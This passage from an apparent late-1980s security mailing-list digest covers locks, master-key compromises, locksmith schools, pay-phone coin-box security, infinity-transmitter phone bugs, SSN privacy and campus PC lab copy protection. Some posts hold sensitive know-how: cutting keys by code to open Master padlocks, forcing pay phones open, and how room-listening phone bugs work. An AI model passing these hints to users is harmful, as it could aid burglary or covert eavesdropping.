probaby vary from lock to lock within a certain amount]?? Obviously there will be one tool per keyway, but even something with an exact keyway fit and a short little pin on the bottom may still torque the normal shear line enough to confuse matters. _H* From: David Millman 4-Dec-1987 09:25:08 To: SECURITY@red.rutgers.edu Subj: [1002] Lock Query I inherited an "Abloy" lock on my front door. Was wondering if the lock theory experts on this list have had any experience or comments about this sort of lock. It's a bit conventional: metal-key-in-hole-in-cylinder. But the the key and the hole have very little orientation (much less than Medeco) and, when turning the cylinder, there seems to be a very loose fit. Locksmiths in the area (Manhattan, lots of lock stores) don't know anything about it. And the original owner said you have to send proof of purchase to scandinavia to key a duplicate key. Is this lock of any theoretical interest? ----------------------------------------------------------------------------- David Millman arpa: dsm@cunixc.columbia.edu Sr. Analyst/Programmer bitnet: dsmus@cuvma Columbia U Computer Center uucp: ...rutgers!columbia!cunixc.columbia.edu!dsm From: "Louis S. Graham" (GC-CDSI) 2-Dec-1987 11:52:53 To: security@RUTGERS.EDU Subj: [690] All related computer crimes and out come. To all interested parties, I have been assigned to give a computer security briefing on how essential computer security is needed here at this ARMY site. Any information anyone can provide me with in reference to computer crimes, what the out come of the event was, if possible, what kind of controls were put in place because of the incident. Also what ever material you may have relating to this subject will be greatly appreciated. Louis Graham, EDP Security Analyst From: uunet!kitty!larry@RUTGERS.EDU (Larry Lippman) 3-Dec-1987 00:20:20 To: security@RUTGERS.EDU Subj: [1856] Vehicle Locating Devices > Does anyone know where to conveniently purchase some kind of device > to place in a car to track where that car is going? If you have a minimum of $ 10K to spend, you can do it "the right way"... There is a company called Ocean Applied Research (O.A.R.) in San Diego which manufacturers sophisticated radio direction finders and locating transmitters. The direction finders are available in various models which cover frequency ranges from LF (0.05 MHz) to UHF (520 MHz). These direction finders provide an a polar oscillographic display of bearing and relative signal strength. These systems use stationary antennas of the Adcock-type for fixed or marine installation, and of a low-profile ferrite loop type for vehicular or aircraft installation. The O.A.R. direction finding equipment is fairly compact, and is suitable for permanent or temporary installation aboard ships, aircraft and vehicles. O.A.R. direction finding equipment is extensively used for search and rescue operations, animal tracking for natural sciences research, location of unlawfully-operated radio transmitters, and for "other" purposes. O.A.R. is considered the "Cadillac" of non-milspec direction finding apparatus (you don't even want to _know_ the cost of equivalent military-grade apparatus). O.A.R. does manufacture transmitters for tracking purposes, although most of their transmitters are intended for oceanographic studies. <> Larry Lippman @ Recognition Research Corp., Clarence, New York <> UUCP: {allegra|ames|boulder|decvax|rutgers|watmath}!sunybcs!kitty!larry <> VOICE: 716/688-1231 {hplabs|ihnp4|mtune|utzoo|uunet}!/ <> FAX: 716/741-9635 {G1,G2,G3 modes} "Have you hugged your cat today?" From: 4-Dec-1987 07:25:08 To: security@ubvm Subj: [1410] Computer security systems. Frankly, this computer security issue is the biggest load of bilge I've ever heard. It seems so obvious that most computers should not be open, the whole issue is a waste of bandwidth. Banks have safes. Houses and cars have locks. I doubt that the proponents of "open-systems" leave their houses and cars unlocked. Our society suffers the inconvenience of security not because the society as a whole is bad, but rather because a select few are bad. And so we must all suffer the inconvenience. Those who think systems should be open must also believe that all people are good. Talk about a pipe|dream. History has proven that computer security is necessary. Those who choose to ignore this are either destined to repeat history, or should see the reality of things. I don't want to really get into politics here, but consider this example. Why do the soviets and the u.s. have such an arms buildup? Why do we spend so much on security? Gracious, the soviet secretary general has never even SEEN this country. The answer is simple. Because neither country can ASSUME the other won't try something. That would be reckless, and there is too much at stake. Computers (and any security for that matter) must work on the same principles. One cannot ASSUME safety. One must ensure it. From: bzs@bu-cs.bu.edu (Barry Shein) 4-Dec-1987 14:52:25 To: psw@wolfgang.arpa Subj: [569] master key security One would think the decision to re-key or not would be settled by a conversation between the University's and their Insurance company's lawyers. Unless they don't mind leaving the campus in a situation where claims might be disallowed based on a lack of minimally acceptable security practices. Most University's self-insure up to a high deductible ($100K is not unusual) but something as global as this can easily threaten that deductible. -B From: gwyn@brl-smoke.arpa (Doug Gwyn ) 4-Dec-1987 15:58:40 To: misc-security@uunet.uu.net Subj: [2178] Re: Home Locksmith Courses >might have an opinion (uh-oh! I'm asking for it) on the worth of the >so called 'home locksmith' courses that one sees advertised in magazines. The Belsaw locksmithing course is fairly good, and you end up with a key machine that is adequate for most routine key cutting. You also have the opportunity to purchase supplies, and as I recall you can start a subscription to the National Locksmith magazine, which gets you bonded. Most communities require practicing non-student locksmiths to be registered; some have started to require certification tests. It is a good idea to comply, since otherwise they might run you in for possession of "burglar tools". (This despite the fact that very few actual burglars use locksmithing tools, except possibly for automobile door opening tools.) Once you have your student locksmith card and National Locksmith subscription, it isn't too difficult to get locksmith supply companies to deal with you. You might consider investing in a supply of professional business cards, saying something like "Joseph M. Blow -- Security Consulting Services". When I was at Rice, a group of students set up a small firm "Richard E. Ingram Associates" and had letterheads printed, etc. It doesn't take very much to gain some degree of credibility in the business world. You can also perhaps get a limited amount of equipment and supplies from a company like Curtis that supplies the corner 7-11 key shop. They're mostly good for key blanks and of course key machines. The "Curtis code clipper" was a handy little portable device for making keys by code; that and a Curtis Master padlock code book would get you into a lot of places (because people often don't erase the code number printed on the face of Master padlocks). I even had a favorable Dun & Bradstreet rating for a while as a result of dealing with Curtis. If you're going to get into the locksmith business, please make sure you develop a good sense of professional ethics, not using your skills to trespass or cause damage or loss to others. From: decvax!felix!chuck@ucbvax.berkeley.edu (Chuck Vertrees) 4-Dec-1987 20:42:41 To: Subj: [862] Re: master key security >What will the administration do if they find such a lock has >been removed by brute force? I once worked at a high school and they had just this problem. Someone had compromised the master and they were faced with finding a solution. This particular school was constructed in a campus type arrangement with ten buildings, each with eight exterior doors. Keying was in a master/submaster/ individual scheme, layered as appropriate. The school system had their own internal locksmith department, doing all the keying themselves. Budgets being what they are, they took the cheap way out. They designated two exterior doors in each building to be re-keyed and plugged all the others with epoxy. Chuck V. From: csi!csib!lgold@spam.istc.sri.com (Lynn Gold) 4-Dec-1987 16:30:58 To: psw@wolfgang.arpa (Phil Wherry) Subj: [658] Re: master key security >I can say from more-or >less first-hand experience that a college administration's reaction is to >merely shrug their shoulders and cross their fingers in the wake of a fairly >major breach of master key security. Columbia University was the same way. There were two or three sets of master keys MISSING, yet they did not want to re-key the locks. I guess they figure that the amount in labor (union wages) isn't worth paying when everything the school cares about is insured anyway.... --Lynn From: Mike Linnig 4-Dec-1987 14:18:54 To: security@RED.RUTGERS.EDU Subj: [1928] RE: Re: Picking locks on pay phones I worked as a teleco lineman one fall (an engineering co-op job). As part of that work we had to go around and extract the cash boxes from the payphones. They gave us a large ring of keys (not a master key). Incidentally, we never really touch the coins, they fall into a coin box that gets replaced when we open up the phone. As for the phones being alarmed, I really don't believe it. Except for high crime areas maybe. On one occasion we had a phone that would not open at all. The key mechinism was jammed (it came from a high school -- I wonder who jammed it?). I got to try and break into the phone -- fun fun. We tried drilling out the lock. We trashed a drill bit or two doing it but we managed to get a nice hole through the lock cylinder. Well, that was fun, but it got us no where. It still wouldn't open. We decided to take the phone off of the wall. The mounting bracket was designed so that you only had access to the mounting screws if the phone was unlocked. I really don't remember how we did it, but we got it off of the wall (probably by brute force -- I had a BIG partner). By the way, no alarms went off. No police arrived on the scene. Remember this was in a high school -- If they alarmed phones in general, I wouldn't expect them to have the high school phone disabled. Anyway, we managed to get the damn thing open by lots of prying with large screwdrivers (used as crowbars) and some hammering. The phone was totally worthless -- but we got the money back to the telco (the phone had to be replaced anyway, can't leave them until they fill up with coins). This was a small telco in southern indiana, Bell systems and GTE may do things differently. Mike ps. Don't do this with your phones, someone MAY get annoyed (grin) From: uunet!kitty!larry@RUTGERS.EDU (Larry Lippman) 5-Dec-1987 09:37:44 To: security@RUTGERS.EDU Subj: [3628] Submission for misc.security (Coin telephone security) > He told me that they were alarmed, and that if you open > one even with a key at the wrong time, telco will phone the police. If this is true, it only applies to newer electronic coin telephones, and NOT the traditional single-slot coin telephones such as the WECO free standing types (1A, 1C series) or the WECO "panel-mounting" types (2A, 2C series). The only thing close to an "alarm" is that some coin telephones had a coin "bank" [the proper term] with an electrical contact on the top. When the bank gets full of coins, a ground is effectively placed on this contact. This ground is placed in series with a resistor which places a high resistance ground to one side of the telephone line. This condition can be periodically scanned by automatic equipment in the central office to ascertain if a coin telephone bank is full. Actually, I have only seen this done on some early multi-slot coin telephones during the 1960's, and I don't believe this feature was even provided on single-slot coin telephones. Coin telephone repairpersons usually have no keys for access to the coin bank portion of a coin telephone. There is actually no need for them to have access, since all repairs can be made with the upper housing opened. Opening the upper housing gives no access to the coin bank; you would need something like string and chewing gum :-) to extract any coins from the bank. Restricting coin bank keys to coin collection (and not repair) personnel gives telephone companies a better sense of security. Coin banks have a sliding cover with an interesting lever mechanism; the coin banks are intended to be provided with a wire seal. With the seal intact, the bank can be inserted and removed from a coin telephone ONLY ONCE. There is no way to remove a full coin bank and open the cover to get access to the coins without breaking this seal. Quite frankly, telephone company security personnel seem more paranoid about employee theft from coin telephones than from theft committed by the general public. Occasionally, a malfunctioning coin collection mechanism will cause a few coins to spill into the upper housing where a repairperson might have access to them. The proper procedure is to take the coins, place them in a special envelope, label it and seal it right away; the envelope is to be turned in to supervisory personnel as soon as possible. Some BOC security personnel seem to have nothing better to do than plant "marked" coins in the upper housing of a coin telephone, and try to bait some repairperson into not properly turning in the money. I also find amusing the following introductory paragraph as quoted from a BOC coin telephone service manual: "Social changes during the 1960s made the multi-slot coin station a prime target for: vandalism, strong arm robbery, fraud and theft of service. This brought about the introduction of the single slot coin station and a new environment for coin service." Social changes?! :-) My knowledge of coin telephones ended with the single-slot series mentioned above. I have almost no idea what happens inside the new-fangled coin telephones with CRT's and credit-card readers. <> Larry Lippman @ Recognition Research Corp., Clarence, New York <> UUCP: {allegra|ames|boulder|decvax|rutgers|watmath}!sunybcs!kitty!larry <> VOICE: 716/688-1231 {hplabs|ihnp4|mtune|utzoo|uunet}!/ <> FAX: 716/741-9635 {G1,G2,G3 modes} "Have you hugged your cat today?" From: Bob Kusumoto 4-Dec-1987 21:19:09 To: security@rutgers.edu Subj: [1096] Re: Picking locks on pay phones I don't know about these new phones that other companies other than MaBell are putting out but the old standard pay phones are not alarmed. They have 8 tumbler locks on them so it is VERY difficult to pick these open. I have heard stories about people hooking up a van to a pay phone to pull it out and the axle was ripped out from the van. Another story from the north (Canada) was to pour water into the coin slot, let it freeze over then hit the phone so it splits open. The reason why the phone company switch to these more secure pay phone was that people were breaking into the older models and they needed to collect more money (by the way, the phone company spends aprox $1800 per pay phone plus any other extras they want to add like a light or special set-up for it). Hope this information helps. Bob Kusumoto Internet: kus3@sphinx.uchicago.edu BITNET: kus3@sphinx.uchicago.bitnet UUCP: ...{!inhp4!gargoyle,!oddjob}!sphinx!kus3 From: sundc!netxcom!dgidez@seismo.css.gov (Daniel Gidez) 5-Dec-1987 13:17:47 To: seismo!misc-security@seismo.css.gov Subj: [483] Re: virus alert A word of note, working part time as a reservationist for an airlines, I came across a call from a frantic person who was trying to trace a lost bag, I asked him the contents and he explained about the virus... he told me it was to be used in some systems going overseas... it could be some college student got hold of this.... From: quintus!gregg@Sun.COM (W. Gregg Stefancik) 5-Dec-1987 21:22:16 To: security@red.rutgers.edu Subj: [2152] Locksmithing School directory and commentary A list of locksmithing schools appeared in this months National Locksmith. For those of you who can't obtain a copy I have retyped the list below: Acme School Locksmithing Divison 11350 S. Harlem Worth, IL 60482 312 361 3750 Foley Belsaw Institute 6301 Equitable Rd. Kansas City, MO 64120 800 328 7140 California Institute of Locksmithing 14721 Oxnard St. Van Nuys, Ca 91411 818 994 7426 HPC Learning Center PO Box 2093 Schiller Park, IL 60176 312 671 6445 Locksmithing Institute 1500 Cardinal Drive Little Falls, NJ 07424 201 256 4512 NRI Schools 3939 Wisconsin Ave. Washington, DC 20016 202 244 1600 NY School of Locksmithing 152 W. 42nd St. New York, NY 10036 Security Education Plus PO Box 497 Nicholasville, KY 40356 606 887 6027 Universal School of Master Locksmithing 3201 Fulton Ave. Sacramento, CA 95821 916 482 4216 I have had some experience with two of the above schools. I graduated from the Foley Belsaw Institute course which does a reasonable job of covering the basics, but the course is a bit dated. You will not learn about interchangeable cores, opening modern cars, or pushbutton locks. Foley Belsaw does provide you with the connections to obtain proper bonding and subscriptions to the two popular trade magazines (National Locksmith and Locksmith Ledger). Foley Belsaw will also provide you with locksmithing supplies at a reasonable cost, but once you make connections via the trade publications the sky is the limit. It is a wonderful way to increase your locksmithing knowledge and be right with the law at the same time. They also provide you with an extremely useful key machine which can copy keys and cut them by code w/o depth keys. I sent away for the NRI course information and found that while the course was a little better packaged than the Foley Belsaw course it cost roughly 3 times as much! I would not recommend the NRI course unless you have big bucks to burn. Gregg Stefancik Foley Belsaw Certified Locksmith quintus!gregg From: brock@pnet01.cts.com (Brock Meeks) 6-Dec-1987 11:09:01 To: crash!security@rutgers.arpa@bass.nosc.mil Subj: [849] Re: Picking locks on pay phones Steve, I have happened to get a copy of that article you read in the Blade re: the guy with the special tools. I asked at NATA, of the Medeco folks, if they had heard of our San Diego coin bandit, they had, he is the *same* guy as in the blade; an industry legend. Seems the security folks have tracked him across the nation. He used to be a machinist. He's never hit a Medeco lock, only "old telco" boxes (whatever those are). As for the 20 minute time frame? Forget it. The guys I talked to said, "He's just about as fast as a guy with a key." The favorite story: the time he cracked a box right before jumping on an airline, in broad daylight, waiting to board a plane. From: brock@pnet01.cts.com (Brock Meeks) 6-Dec-1987 11:09:30 To: crash!security@rutgers.arpa@bass.nosc.mil Subj: [1581] Re: Picking locks on pay phones > He told me that they were alarmed, and that if yo upoen one, even with a > key at the wrong time, telco will phone the police. This is wrong, according the pay phone specialits I interviewed for an article I wrote. I was just at the North American Telecomm. Association show in Dallas, and they had a big payphone pavillion there. The only way these guys know a phone has been hit is when they come to empty it. I spoke with the folks at Medeco (they had a big display of their "virtually pick proof lock) and they verified the problem with pay phone locks. You see, it seems that with the influx of private pay phones, these guys were starting to toss "crap on the market" (crap being locks) and they cared more about profits than good security (a topic of conversation that only recently began getting any kind of hearing in the pay phone industry). BUT...cracking the lock box is not the BIG DEAL. The *real* story is that guys are ripping off the expense COMPUTER BOARDS and electronics in the upper half of the phones. These boards run some $300 or $400 a piece and according to one security analyst, "There's a huge black market for these boards." Interestingly enough, the locks protecting the electronics are far easier to pick than the coin box lock. "These guys are more worried about protecting $20-$50 in coins rather than $300-$400 in electronics," the rep from Medeco said. You figure it. From: jb7m@andrew.cmu.edu (Jon C. R. Bennett) 6-Dec-1987 15:42:28 To: security@RUTGERS.EDU Subj: [2223] Re: Computer Security Systems >I suspect that vandalism would still be rare (my basic optimism in humanity) >but when it did occur it would be drastic I tend to agree with that statement. It seems to me that the basic problem is that you are going to let all these people lose on the system and then for fun one of them is going to delete the system. However you are forgeting one thing in such a system if you kept track of deletetions and zero length over writes and the like you could take real world action against such people i.e. you can do what you want but if we catch you the results are going to be messy. Another soultion is to have a large elite, i.e. the number of people who would have total access would larger then it is now and people would get to such a postion simply by being trustable in the eyes of the current users. I don't know if any of you know of MIT's ITS(incompatable timesharing system) in which the users had free roam. When you login to ITS it tells you how many users there are on the system USERS : 5 but someone changed it to say LOSERS: 5 it was changed back and forth a few times and finaly setteled on LUSERS: 5 something that was acceptable to all. An other complaint is that someone will eat up all of the CPU or disk space but what you dont see is that if everyone is equal then if there are 5 people on the system then if everyone is using CPU munching programs then the CPU time will be split 5 ways and if someone does not need all of theirs it will be split among the rest. As far a disk space split it evenly among the users and if someone needs more they can have it by general consensus. My basic point is that the users are responsible to someone, they are responsible to the group and if that is not enough then they should not be admitted to the group. It may appear that I am contradicting my self by saying there should be a group, but I bow to reality I that there will always be people that can not be trusted but if there are allowed to use the system they it should be as equals not as subordinates. Jon Bennet jb7m@andrew.cmu.edu From: *Hobbit* 8-Jan-1988 16:24:29 To: Security: ; Subj: [7340] Security msgs re: SS numbers -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: matt@oddjob.uchicago.edu (Schizophrenic Solipsist) Subject: Re: SSN Date: 10 Dec 87 05:15:58 GMT Could some kind soul mail me a pointer to the relevant laws that allow me to try to keep my SSN private? Hardly a month goes by that some sales person or public-service droid doesn't insist that their company requires my SSN in order to do business, extend credit, or answer a question. ________________________________________________________ Matt University matt@oddjob.uchicago.edu Crawford of Chicago {astrovax,ihnp4}!oddjob!matt -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Wed, 9 Dec 87 17:35:07 PST From: gea@Romeo.Caltech.Edu (Gary Ansok) Subject: SSN's In a recent message, Larry Hunter described some quite awful things happening to a person because a police department get his name by mistake, and used that as an argument against giving out your SSN. Are such mixups more likely, or less likely, if police departments use SSN's as a key rather than personal names (or whatever would be used instead if we all refused to give out our SSN)? If someone wants to impersonate someone, they are as likely (or more) to do it on the basis of a name as a social security number; you also have the possibility of duplicate names (yes, these have also caused problems without any misrepresentation by any party involved). The problem is not the identifying key used; one problem is the non- robustness of data (if the tattoo in Larry's example had been included in the warrant and checked by the officers, this might not have arisen). Any method of keeping data requires a unique key for a person. One hopes that in the case of critical data, there will be some secondary data which, even if not unique, will verify that the primary key is valid. What really worried me about Larry's story was the fact that a birth certificate (which has no picture and only minimal physical description) is often regarded as the ultimate ID in our society. Gary Ansok ansok@scivax.stsci.edu or gea@romeo.caltech.edu P.S. On a different topic, I salute my credit union: My primary account number, which is the only one to appear on my checking and Visa statements, does not appear on either my checks nor my Visa card. I have often wondered how secure banks are with all the numbers written on checks &c. -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Sun, 13 Dec 87 14:57:08 EST From: Larry Hunter Subject: Re: SSN Jonathan, I apologize for calling your characterization a bit naive. Let's look at where we might agree. First, in my original posting I concluded my nasty scenario with the following caveat: Paranoid? Sure. I don't think this sort of thing happens very often, but it provides an idea of the power in those 9 digits. I personally believe that the institutional (mis)use of SSNs is by far a worse problem than the kind of criminal behavior I just described, but I find the latter is more persuasive to people who are cavalier about having "nothing to hide". You made this point more strongly: ... Injustice has happened before there were computers and widespread usage of SSN's. I am sure that we will still have to continuing fighting these cases as long as there is civilization. However the possibility of the kind of hassle mentioned in the article to which I replied is probably less than that of being hit by a car, robbed at gunpoint, or harrassed in a more "traditional" manner. Your point is well taken. SSN based abuse is not all that likely. On the other hand, it is sobering to realize how important records about us are to our well being. People can indeed suffer significant harms because of records about them. It is rather pointless to end up with high blood pressure, heart disease, depression, and lost productivity because you spend half of your life fighting the phone companies or someone elses usage of your SSN or any other number. This I have a harder time with. Although I try not to get too stressed out over it, I think there are real problems arising from institutional abuse of SSNs. My concerns (and my reasons for holding my SSN closely) are as I stated originally: The practical reasons to associate your SSN with as few records about you as possible have to do with the fact that large, powerful entities (like the IRS and large consumer products companies) use techniques like block modelling and record matching to exert significant power over individuals. Do not underestimate the hidden uses of SSNs. They are more important, although sometimes less publically compelling than the criminal ones. Consider some of the decisions that information associated with SSNs effects: * Whether or not you get audited by the IRS. * How much your health, life and property insurance cost, and whether or not it is available to you at all. * Whether you are granted credit to buy a house, or a car, or get a credit card (the latter is used as an important distinguishing factor between "haves" and "have nots" in our society). * Your access to government assistance (from farm loans to student aid to aid to families with dependent children). * Who becomes the target of law enforcement investigations. Computer matching of records is a rapidly growing source of prosecutions that strikes me utterly without probable cause. Also, don't forget that the Church Committee investigation of the US intelligence community in the late 70's said that the ability of the government to track and monitor individuals, if turned to repressive ends, would be sufficient to squash all dissent. Much of that ability derives from computer record keeping based on unique personal identifiers. * How large corporations sell their goods to consumers. Information associated with you (perhaps associated with SSNs, although it has not been demonstrated) is used to target specific advertising that has been shown to be effective on people "like" you. Different (possibly contradictory) advertising may be shown to others. * How politicians influence you to vote. Although (like advertisers for consumer goods) use of SSNs has yet to be documented, politicians use techniques based on personal information similar to that of other advertisers to influence your political opinion. Not all of these possible uses (and abuses) of SSNs are commonplace, but many of them are. Part of our role as members of this community is to try to foresee threats to our privacy and security and inform others about them. I believe that, although such threats may pale in comparison to physical violence, they are significant and worthy of discussion. The Privacy Act of 1974 which limited uses of SSNs, held that unique personal identifiers in wide use were an important threat to individual rights. I agree with that sentiment, and would suggest that threat is more significant now than ever before. Larry Hunter From: *Hobbit* 8-Jan-1988 16:27:14 To: Security: ; Subj: [4221] Security msgs re: infinity transmitters -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Wed, 25 Nov 87 13:09:33 EST From: Dave Kucharczyk Subject: Re: Infinity Yes, infinity transmitters do exist. they work on the principle that the audio path is made even before a dialed phone starts to ring. one sends a tone down the line which tells the infinity transmitter to "pick up" the phone before the ringing starts, and can then listen to teh location where the bug is planted. however these devices are pretty much made obsolete by the fact that any of the ESS switches do not open an audio path untill they receive answer supervision from the dialed end. ssr -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Thu, 26 Nov 87 11:51:35 EST From: Larry Hunter Subject: Re: Infinity Ever heard of an "Infinity Transmitter"? Yeah, they are pretty old tech bugging devices. They used to work fine, but with the advent of separate signalling and voice circuits in ESS (the electronic version of Ma Bell's switching system) they became obsolete. The idea was that the bug would listen to the phone line for a tone. When it heard the tone (or combination of tones -- they were called harmonica bugs because people often used harmonica notes to trigger them) it would pick up the phone and you could listen to what was going on in the room that the phone was in, before the phone rang. The problem in ESS is that the caller is not connected to the line when it is ringing -- the audio connection is only made when the phone is picked up -- so the bug cannot hear the incoming tone. No audio path to transmit the tone, no infinity bugs. One might imagine more sophisticated versions of the infinity bug; It could pick up the line WHENEVER it rings, check for the tone, do the infinity bug thing is the tone is present and if the tone weren't present it would have to generate its own ringing voltage (for the phone) and ringing tone (for the caller) until the line really got picked up. As you might imagine, the ESS infinity bug would have to be much more complicated (read more expensive and more likely to be detected) than the old style ones. I've never heard of anyone trying this. There are lots of telephone exchanges that are not ESS (step and crossbar are the two main alternatives) where the simple old infinity bugs still work fine. Any exchange where "Custom Calling" (e.g. call forwarding or call waiting) is not available is probably not ESS. People still sell things like infinity bugs as "home baby sitters" or as burgler alarms, but they answer the phone all the time even though they only turn the mike on if they receive a tone. These are usueless as bugs because no one can make calls TO the target -- the bug always answers the phone. You can rest easy re: infinity bugs, although you should be aware that it is a pretty trivial task to use electronic surveillance these days and that a lot of people do it. Larry -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Sun, 29 Nov 87 16:27:38 EST From: Mark W. Eichin Subject: Infinity Transmitters I saw an article on these once (on a bboard that got closed down about a year later for phone credit card postings). The main idea was that someone who wanted to tap the room would add this little circuit board to the phone, which would detect some sort of tone on the line when the phone first rang, inhibit the ring, and open the microphone. Something was mentioned about ultrasound (unlikely, given the quality of the phone lines, but it was being vague), and how you could tap in from anywhere as long as you could dial direct (ie. even from England). The main flaw was that the phone was of course busy (to the outside world) the whole time you were monitoring. It was allegedly used extensively by PI's to gather ``evidence'' for divorce proceedings. The article did not have much in the way of technical detail; oh well. Mark Eichin From: *Hobbit* 11-Jan-1988 17:23:10 To: Security: ; Subj: [7502] Security msgs re: student PC labs -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Tue, 24 Nov 87 11:46 EST From: APHRODITE Subject: PC Lab security What we have done here is to designate one computer as a file server and put everything on a hard disk in different directories. The directories with the system software is read/only and the files are copy protected. Any software that can be copied is designated as freeware. We have set up a menu with all of the software on it that we have. When someone wants to use or do something they can just pick it of of the menu. The file server is set up for several applications. -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Subject: RE: Lab Security From: IP60577@PORTLAND Date: Mon, 23 Nov 87 23:24:18 EST Here at the University of Southern Maine, We have a Lan network with Zenith 248 terminals. The students have no access to files through channels of hidden sub-directories, with hidden files. There is a public domain program from PcSig called Alter.Com that allows the changing of the archive bit. I am sure that there are a number of others out there. This seems to work very well, here at the university. There are occasions when students will try to find the files, but for the most part, there is no way that students can find them. The programs are not executed by DOS Batch files. There is a menu program that the students "myself included" must use. When a student boots the terminal, it gives them a selec- tion menu, that, will load a program simply by moving the up and down arrow keys to make the selection. Once the selection is made, entering a carriage return will load the program. The only way for students to get around this is to dis-assemble the pro- gram. However, how many students "who should be learning the programs them- selves" know how to do that? Simple suggestion. The words I have archived here are of mine own intent, since I am a Student of the University of Southern Maine, and NOT Faculty. -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Sat, 5 Dec 87 11:36:20 EST From: Michael Grant Subject: Copying Software I've been of the opinion for a long time now that hardware vendors would really LIKE people to be able to copy software with their hardware. This is a selling point for the hardware. People who would otherwise not buy the hardware, would because they could get lots of free software from friends. -Mike -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Mon, 7 Dec 87 12:53 EST From: SPARKS@DRYCAS.CLUB.CC.CMU.EDU Subject: Physically securing a pc What is the best way to secure a pc system against physical theft? The AT lock provides some protection, but none against a burglar carrying away the whole cpu. I'm considering purchasing a security system which consists of attaching steel plates to the pc and peripherals with a strong adhesive, and then conneccting each of the plates via a cable and lock. However, I just wonder what my options are, and if this is a safe route to follow. Thanks, Sparks@Drycas (bitnet) MY0L@Andrew.cmu.edu (arpa/internet) -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Sat, 5 Dec 87 23:34:01 CST From: Bob Kusumoto Subject: Re: Student Lab Security and Preventing Trojan Horses Just to let you know what has happened here a while back (don't remeber when, maybe about a year ago), a BBS in the Chicago area called Mad Marty's, a popular Mac board, had a section of software that was unprotected by various hackers and put in a "pirate" section of this BBS. An association of software developers for the Mac caught wind of this and promptly got the local authorities involved. Generally, they came to an agreement, no copy protected software to be distributed. If I remember correctly, a few Mac boards went down because of this incident. just wanted to let you know Bob Kusumoto (an Apple II user) Internet: kus3@sphinx.uchicago.edu BITNET: kus3@sphinx.uchicago.bitnet UUCP: ...{!ihnp4!gargoyle,!oddjob}!sphinx!kus3 -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: rick@uwmacc.UUCP (the absurdist) Subject: Re: Student Lab Security (hidden costs) Date: 10 Dec 87 00:16:58 GMT >I wonder about all these precautions to stop students from copying >software. Stolen software causes a direct overhead to the University in the form of consultant's time wasted trying to help people who first rip you off for the program; then keep bugging you for help because they have no manual for the program and are guessing how it works; then have problems because their illegal copy doesn't get updated by the manufacturer for bug fixes, and finally steal your copy of the manual, leaving you with the bill. Two common tactics are (1) doing a label swap for "key" disks (i.e., Lotus 123), so that it can be borrowed and a blank returned in its place (at least $50 worth of hassle each time); removing pages from those lovely ring binder manuals everyone uses. There isn't ANY solution to theft that doesn't penalize honest users heavily; as it is our procedures are much more inconvenient to our users than our original policies and we still have problems. Still, doing nothing makes the situation even worse. For commonly ripped off programs we have at times resorted to a roll-your-own copy protection (even for those programs which weren't copy protected originally), just to begin to defend ourselves against this problem. I don't support SELLING software as copy protected, but I think any facility should have the option of protecting their own legal copies to restrict them to their legal use. -- Rick Keir -- all the oysters have moved away -- UWisc - Madison "Watch the skies...." -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: Fri, 11 Dec 87 10:33 EDT From: Mike DeMaria (Pasart Harloc) Subject: Copy protection The onbly way that anyone is going to be able to defeat software piracy on campus, is to physically copy protect the disk. One such program that I have found, is a game called "Write your own Murder Party" by E.O.A. They have physically put a Laser "ThumbPrint" on track 15 that is unduplicatable, even buy the most expensive disk duplicators. To further the problem, the placed the main program on the back side of the disk, with the FAT showing only one side. This prevents a person from loading the program and then looking for the "copy code". Hats off to EOA on this copy protection... H O W E V E R How does the honest person who bought the program (me) make a backup? -Pas -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: sundc!netxcom!dgidez@seismo.css.gov (Daniel Gidez) Subject: virus attack!!! Date: 21 Dec 87 17:14:28 GMT I have seen several articles relating to the MSDOS virus, if there is anyone out there in netland who has a command.com that they know is infected, I would like to get a copy of it and NO I DONT WANT TO USE IT, but merely try an isolate it and analyze it, Ive got a system rearin' to go just for the test, if you have a copy of it, I would like to get it. I am not the FBI or any other law enforcement angency (any definately not microsoft) this would be appreciated and hopefully I could provide a solution (the actual code thats being used..) All responses will be kept confidential and I will even pay for it. From: *Hobbit* 11-Jan-1988 19:05:37 To: Security: ; Subj: [9780] Security msgs re: secure computer system discussion -*-*-*-*-*-*-*-*-*-*-*-*-*-*- From: motown!ninja!killer!elg@RUTGERS.EDU (Eric Green) Subject: Re: Why secure systems? Date: 6 Dec 87 17:16:07 GMT >Since they probably have this funny thing called a "budget" >to work within, the accountants most likely have forced them to find >ways to equitabily charge out resource usage. The cost of maintaining a large IBM mainframe and interconnecting Ethernets (e.g. with PC's) is a constant, irregardless of usage. While DP professionals make it seem like you are using up a "resource" which must be "accounted for", in actuality those expenses should be a constant number of dollars in the Computing Center's budget. Any other form of accounting discourages use of the available computer resources, thus harming productivity. Considering that a big IBM 3090 installation can handle over 400 users easily for the "mere" cost of 6 million dollars or so (about what a big computer costed 20 years ago!), we have the anomoly of companies buying big computers for whatever reasons (prestige? Array-processor coprocessor?), and then having that computer languish mostly unused because of restrictive accounting and security practices. This is not, of course, related to 3rd-party computing resources, i.e. you own a mainframe, and local businesses contract with you for computing resources. In that event, it of course makes sense to distribute your constant cost amongst them based upon their usage of the system, plus a profit margin atop that. But for internal computer resouces, not only is such an accounting irrelevant (the company still spends the same amount of money, no matter WHAT departments are charged for it), but counter-productive too (since it discourages use of the computer resources). After all, why do you think that personal computers have become so popular, despite being quite limited in what they can do? Simple: people no longer have to go through 20 layers of bureaucracy in order to gain access to computer resources, and they don't have to cope with a mentality that says computer resources are limited and rare and should be used sparingly -- a mentality that may have made sense when a large timesharing computer costed $15,000,000 (in today's dollars) and accomodated only 100 users, but in today's world, such an attitude is patently absurd (as personal computers amply demonstrate). -- Eric Green elg@usl.CSNET Snail Mail P.O. Box 92191 {cbosgd,ihnp4}!killer!elg Lafayette, LA 70509 Hello darkness my old friend, I've come to talk with you again.... -*-*-*-*-*-*-*-*-*-*-*-*-*-*- Date: 8 Dec 87 09:56:01 PST 